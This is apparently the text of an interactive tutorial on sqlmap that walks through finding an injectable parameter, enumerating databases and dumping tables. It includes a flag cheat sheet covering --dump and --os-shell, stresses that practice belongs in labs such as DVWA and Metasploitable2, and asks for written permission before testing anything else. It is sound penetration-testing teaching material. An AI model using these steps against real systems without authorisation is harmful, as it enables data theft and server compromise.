Find an injectable parameter and sqlmap escalates from 'huh, odd error' to full database dump — automatically. Learn the manual technique on PortSwigger first, then let sqlmap flex.
Follow the steps — click any step card to replay the terminal demo from that point. Everything runs in a lab you control.
Quote the URL! Any param like ?id= is candidate #1.
--dbs enumerates schemas the app user can see.
-D picks the database.
Loot lands in ~/.sqlmap/output — your evidence for reports.
--level/--risk widen coverage — noisy, so lab-restricted.
| -u | target URL |
| --dbs / --tables | enumerate |
| -D / -T | pick db / table |
| --dump | extract rows |
| --batch | no questions asked |
| --level/--risk | thoroughness 1–5 / 1–3 |
| --os-shell | interactive shell (labs!) |
Start manual: a single ' and reading the error teaches more than 100 runs.
DVWA + PortSwigger SQLi labs are perfect legal playgrounds.
Output CSVs slot straight into pentest reports.
Never --os-* outside your lab; it writes files on the server.
Use sqlmap only on systems you own or have written permission to test. Your lab: Kali + Metasploitable2, DVWA, TryHackMe & HackTheBox — plenty of legal targets, zero risk.